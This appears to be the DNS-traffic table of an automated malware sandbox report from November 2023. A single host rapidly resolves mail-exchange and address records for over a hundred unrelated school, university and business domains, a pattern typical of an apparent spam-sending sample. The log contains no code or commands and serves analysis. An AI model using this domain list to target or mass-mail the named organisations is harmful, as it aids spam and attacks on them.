                                                                                                                                                                                                    Nov 26, 2023 06:59:28.435293913 CET1.1.1.1192.168.2.40xaee3No error (0)midcapfunding.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.435293913 CET1.1.1.1192.168.2.40xaee3No error (0)midcapfunding.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.437302113 CET1.1.1.1192.168.2.40x8e59Name error (3)kvsroraipur.innonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.438477039 CET1.1.1.1192.168.2.40x698fName error (3)mnit.uc.innonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.440583944 CET1.1.1.1192.168.2.40x4aa8Name error (3)lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.440787077 CET1.1.1.1192.168.2.40x5101No error (0)rechagricola.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.444962978 CET1.1.1.1192.168.2.40x7d1cNo error (0)linkan-group.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.444962978 CET1.1.1.1192.168.2.40x7d1cNo error (0)linkan-group.com185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.444962978 CET1.1.1.1192.168.2.40x7d1cNo error (0)linkan-group.com185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.446005106 CET1.1.1.1192.168.2.40x22a6No error (0)srmist.edu.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.446005106 CET1.1.1.1192.168.2.40x22a6No error (0)srmist.edu.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.446005106 CET1.1.1.1192.168.2.40x22a6No error (0)srmist.edu.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.446005106 CET1.1.1.1192.168.2.40x22a6No error (0)srmist.edu.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.446005106 CET1.1.1.1192.168.2.40x22a6No error (0)srmist.edu.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.452969074 CET1.1.1.1192.168.2.40x496aNo error (0)greenrworld.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.453042030 CET1.1.1.1192.168.2.40x6bd6No error (0)himontessori.com74.220.219.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.458976984 CET1.1.1.1192.168.2.40x20e8No error (0)pasarjohar.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.458976984 CET1.1.1.1192.168.2.40x20e8No error (0)pasarjohar.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.464169979 CET1.1.1.1192.168.2.40xd372Name error (3)y3.qj51acpnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.465176105 CET1.1.1.1192.168.2.40xbb23No error (0)viidelta.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.465176105 CET1.1.1.1192.168.2.40xbb23No error (0)viidelta.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.469507933 CET1.1.1.1192.168.2.40x5b43Name error (3)dbschooldelhi.ac.innonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.472088099 CET1.1.1.1192.168.2.40xe3efName error (3)ardcrushing.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.472698927 CET1.1.1.1192.168.2.40x12fbNo error (0)svenssonfriends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.472698927 CET1.1.1.1192.168.2.40x12fbNo error (0)svenssonfriends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.472698927 CET1.1.1.1192.168.2.40x12fbNo error (0)svenssonfriends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.472698927 CET1.1.1.1192.168.2.40x12fbNo error (0)svenssonfriends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.472698927 CET1.1.1.1192.168.2.40x12fbNo error (0)svenssonfriends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.473006010 CET1.1.1.1192.168.2.40xed4bNo error (0)gspousea.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.473006010 CET1.1.1.1192.168.2.40xed4bNo error (0)gspousea.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474117994 CET1.1.1.1192.168.2.40x1655No error (0)leeberg.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474117994 CET1.1.1.1192.168.2.40x1655No error (0)leeberg.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474519968 CET1.1.1.1192.168.2.40xce54No error (0)2brosandahosepressurewashing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474519968 CET1.1.1.1192.168.2.40xce54No error (0)2brosandahosepressurewashing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474519968 CET1.1.1.1192.168.2.40xce54No error (0)2brosandahosepressurewashing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474519968 CET1.1.1.1192.168.2.40xce54No error (0)2brosandahosepressurewashing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474519968 CET1.1.1.1192.168.2.40xce54No error (0)2brosandahosepressurewashing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.474747896 CET1.1.1.1192.168.2.40xcb05No error (0)chandigarhuniversityazure.onmicrosoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.475958109 CET1.1.1.1192.168.2.40x6fdfName error (3)2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.480638981 CET1.1.1.1192.168.2.40x18e5No error (0)americanrecords.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.480638981 CET1.1.1.1192.168.2.40x18e5No error (0)americanrecords.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.487061977 CET1.1.1.1192.168.2.40x99bcNo error (0)samson.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.487061977 CET1.1.1.1192.168.2.40x99bcNo error (0)samson.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.487061977 CET1.1.1.1192.168.2.40x99bcNo error (0)samson.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.489115953 CET1.1.1.1192.168.2.40xcff4Name error (3)paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.492060900 CET1.1.1.1192.168.2.40xa8f2No error (0)quipuapp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.492060900 CET1.1.1.1192.168.2.40xa8f2No error (0)quipuapp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.492060900 CET1.1.1.1192.168.2.40xa8f2No error (0)quipuapp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.492060900 CET1.1.1.1192.168.2.40xa8f2No error (0)quipuapp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.492060900 CET1.1.1.1192.168.2.40xa8f2No error (0)quipuapp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.495789051 CET1.1.1.1192.168.2.40xaf1bNo error (0)dstaq.com185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.495789051 CET1.1.1.1192.168.2.40xaf1bNo error (0)dstaq.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.495789051 CET1.1.1.1192.168.2.40xaf1bNo error (0)dstaq.com185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.496969938 CET1.1.1.1192.168.2.40x8cccNo error (0)unaj.edu.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.496969938 CET1.1.1.1192.168.2.40x8cccNo error (0)unaj.edu.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.496969938 CET1.1.1.1192.168.2.40x8cccNo error (0)unaj.edu.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.496969938 CET1.1.1.1192.168.2.40x8cccNo error (0)unaj.edu.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.496969938 CET1.1.1.1192.168.2.40x8cccNo error (0)unaj.edu.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.501549006 CET1.1.1.1192.168.2.40x9303No error (0)ce-logic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.503030062 CET1.1.1.1192.168.2.40xbb7fNo error (0)grantstech.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.503273964 CET1.1.1.1192.168.2.40x4151No error (0)coralparkchristian.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.503273964 CET1.1.1.1192.168.2.40x4151No error (0)coralparkchristian.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.504400969 CET1.1.1.1192.168.2.40x1ad4No error (0)cardenas.mtz.rimed.cuMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.504865885 CET1.1.1.1192.168.2.40xd9f2No error (0)capforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.504865885 CET1.1.1.1192.168.2.40xd9f2No error (0)capforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.504865885 CET1.1.1.1192.168.2.40xd9f2No error (0)capforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.504865885 CET1.1.1.1192.168.2.40xd9f2No error (0)capforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.504865885 CET1.1.1.1192.168.2.40xd9f2No error (0)capforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.512028933 CET1.1.1.1192.168.2.40xf9a6No error (0)privatemoe.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.525882959 CET1.1.1.1192.168.2.40xcff3No error (0)esistem.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.525882959 CET1.1.1.1192.168.2.40xcff3No error (0)esistem.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.527693033 CET1.1.1.1192.168.2.40x7b49No error (0)gasp-ga.com162.241.224.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.530421019 CET1.1.1.1192.168.2.40xcd6bNo error (0)lumaruniformes.com162.241.62.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.530580997 CET1.1.1.1192.168.2.40xcc35No error (0)engel-firm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.532710075 CET1.1.1.1192.168.2.40x69eNo error (0)robinsonland.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.532710075 CET1.1.1.1192.168.2.40x69eNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.534697056 CET1.1.1.1192.168.2.40x6f88No error (0)tiswheels.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.534697056 CET1.1.1.1192.168.2.40x6f88No error (0)tiswheels.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.534697056 CET1.1.1.1192.168.2.40x6f88No error (0)tiswheels.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.534697056 CET1.1.1.1192.168.2.40x6f88No error (0)tiswheels.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.534697056 CET1.1.1.1192.168.2.40x6f88No error (0)tiswheels.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.538773060 CET1.1.1.1192.168.2.40xc723No error (0)grg17geblergasse.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.540246964 CET1.1.1.1192.168.2.40xcdf5No error (0)rochester-gauges.be178.32.41.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.552253008 CET1.1.1.1192.168.2.40x6b7fNo error (0)prettypollycleaning.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.552253008 CET1.1.1.1192.168.2.40x6b7fNo error (0)prettypollycleaning.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.552253008 CET1.1.1.1192.168.2.40x6b7fNo error (0)prettypollycleaning.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.552253008 CET1.1.1.1192.168.2.40x6b7fNo error (0)prettypollycleaning.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.552253008 CET1.1.1.1192.168.2.40x6b7fNo error (0)prettypollycleaning.aeMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.565763950 CET1.1.1.1192.168.2.40x5785No error (0)firemailbox.clubMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.565763950 CET1.1.1.1192.168.2.40x5785No error (0)firemailbox.clubMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.566531897 CET1.1.1.1192.168.2.40x58b3No error (0)perrisesd.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.566531897 CET1.1.1.1192.168.2.40x58b3No error (0)perrisesd.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.566531897 CET1.1.1.1192.168.2.40x58b3No error (0)perrisesd.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.566531897 CET1.1.1.1192.168.2.40x58b3No error (0)perrisesd.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.566531897 CET1.1.1.1192.168.2.40x58b3No error (0)perrisesd.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.571537971 CET1.1.1.1192.168.2.40x4bf7No error (0)ceuandalucia.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.573909998 CET1.1.1.1192.168.2.40x968dNo error (0)esistem.com.br191.6.210.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.586152077 CET1.1.1.1192.168.2.40x96f1No error (0)xegge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.586692095 CET1.1.1.1192.168.2.40x5623No error (0)harasduberry.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.586692095 CET1.1.1.1192.168.2.40x5623No error (0)harasduberry.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.587913990 CET1.1.1.1192.168.2.40xdf5aNo error (0)gccb.co.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.587913990 CET1.1.1.1192.168.2.40xdf5aNo error (0)gccb.co.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.587913990 CET1.1.1.1192.168.2.40xdf5aNo error (0)gccb.co.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.587913990 CET1.1.1.1192.168.2.40xdf5aNo error (0)gccb.co.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.587913990 CET1.1.1.1192.168.2.40xdf5aNo error (0)gccb.co.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.588016987 CET1.1.1.1192.168.2.40xb6adNo error (0)gruporegiosafety.com144.202.62.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.595663071 CET1.1.1.1192.168.2.40x830bNo error (0)rechagricola.com.br18.229.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.603920937 CET1.1.1.1192.168.2.40x23d1No error (0)tcetmumbai.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.603920937 CET1.1.1.1192.168.2.40x23d1No error (0)tcetmumbai.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.603920937 CET1.1.1.1192.168.2.40x23d1No error (0)tcetmumbai.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.603920937 CET1.1.1.1192.168.2.40x23d1No error (0)tcetmumbai.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.603920937 CET1.1.1.1192.168.2.40x23d1No error (0)tcetmumbai.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.606729984 CET1.1.1.1192.168.2.40x9674Name error (3)highstreet-re.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.617633104 CET1.1.1.1192.168.2.40x5f51No error (0)macisis.co.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.624408007 CET1.1.1.1192.168.2.40xebc9No error (0)nakupher.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.624408007 CET1.1.1.1192.168.2.40xebc9No error (0)nakupher.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.638601065 CET1.1.1.1192.168.2.40x8292No error (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.656409979 CET1.1.1.1192.168.2.40xaeaNo error (0)ondania.com103.224.212.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.676512003 CET1.1.1.1192.168.2.40xa78dNo error (0)my.calvary.qld.edu.au120.88.73.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.680368900 CET1.1.1.1192.168.2.40xe813No error (0)talentius.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.684257984 CET1.1.1.1192.168.2.40x3e42No error (0)students.kasralainy.edu.eg193.227.5.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.685888052 CET1.1.1.1192.168.2.40x7f5eNo error (0)student.ub.ac.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.685888052 CET1.1.1.1192.168.2.40x7f5eNo error (0)student.ub.ac.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.685888052 CET1.1.1.1192.168.2.40x7f5eNo error (0)student.ub.ac.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.685888052 CET1.1.1.1192.168.2.40x7f5eNo error (0)student.ub.ac.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.685888052 CET1.1.1.1192.168.2.40x7f5eNo error (0)student.ub.ac.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.703038931 CET1.1.1.1192.168.2.40x722dName error (3)member3.co.zanonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.703840017 CET1.1.1.1192.168.2.40x75e9Server failure (2)bosworthacademy.orgnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.721586943 CET1.1.1.1192.168.2.40xc4e3No error (0)bunasta.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.723172903 CET1.1.1.1192.168.2.40x39cdNo error (0)integraledu.hr78.128.62.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.724889994 CET1.1.1.1192.168.2.40x977dNo error (0)awb-apparatebau.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.725297928 CET1.1.1.1192.168.2.40xeb93No error (0)student.debritto.sch.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.725297928 CET1.1.1.1192.168.2.40xeb93No error (0)student.debritto.sch.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.725297928 CET1.1.1.1192.168.2.40xeb93No error (0)student.debritto.sch.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.725297928 CET1.1.1.1192.168.2.40xeb93No error (0)student.debritto.sch.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.725297928 CET1.1.1.1192.168.2.40xeb93No error (0)student.debritto.sch.idMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.726675034 CET1.1.1.1192.168.2.40x493fNo error (0)edgewater.group104.200.30.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.739581108 CET1.1.1.1192.168.2.40x2a7fName error (3)utlinks.omnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.747755051 CET1.1.1.1192.168.2.40xd24bNo error (0)americanrecords.it109.168.109.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.755860090 CET1.1.1.1192.168.2.40x131bNo error (0)kappablu.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.759222031 CET1.1.1.1192.168.2.40x9efcNo error (0)adm.uksw.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.759222031 CET1.1.1.1192.168.2.40x9efcNo error (0)adm.uksw.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.759222031 CET1.1.1.1192.168.2.40x9efcNo error (0)adm.uksw.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.759222031 CET1.1.1.1192.168.2.40x9efcNo error (0)adm.uksw.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.759222031 CET1.1.1.1192.168.2.40x9efcNo error (0)adm.uksw.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.782620907 CET1.1.1.1192.168.2.40xe6dbNo error (0)my.calvary.qld.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.788321972 CET1.1.1.1192.168.2.40xe93bNo error (0)locandafrancigena.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.811619043 CET1.1.1.1192.168.2.40x637cNo error (0)maxiv.lu.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.825772047 CET1.1.1.1192.168.2.40xf4dcNo error (0)wonka.ccwonka.cc.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.825772047 CET1.1.1.1192.168.2.40xf4dcNo error (0)wonka.cc.w.cdngslb.com47.246.24.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.827665091 CET1.1.1.1192.168.2.40x2701Name error (3)bayambnag.gov.phnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.832137108 CET1.1.1.1192.168.2.40x8980No error (0)daisyokogyo.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.834623098 CET1.1.1.1192.168.2.40x6774No error (0)financefast.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.834623098 CET1.1.1.1192.168.2.40x6774No error (0)financefast.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.834623098 CET1.1.1.1192.168.2.40x6774No error (0)financefast.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.834623098 CET1.1.1.1192.168.2.40x6774No error (0)financefast.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.849745989 CET1.1.1.1192.168.2.40x6a4No error (0)tradeavenida.com66.235.200.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.872030973 CET1.1.1.1192.168.2.40xc9b0No error (0)ippals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.894707918 CET1.1.1.1192.168.2.40xe0c9No error (0)talentius.com185.54.192.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.899801016 CET1.1.1.1192.168.2.40x9540No error (0)bunasta.eu92.62.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.942820072 CET1.1.1.1192.168.2.40xcf2aNo error (0)federwild.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.951503038 CET1.1.1.1192.168.2.40xa3cbNo error (0)prettypollycleaning.ae192.96.211.44A (IP address)IN (0x0001)false
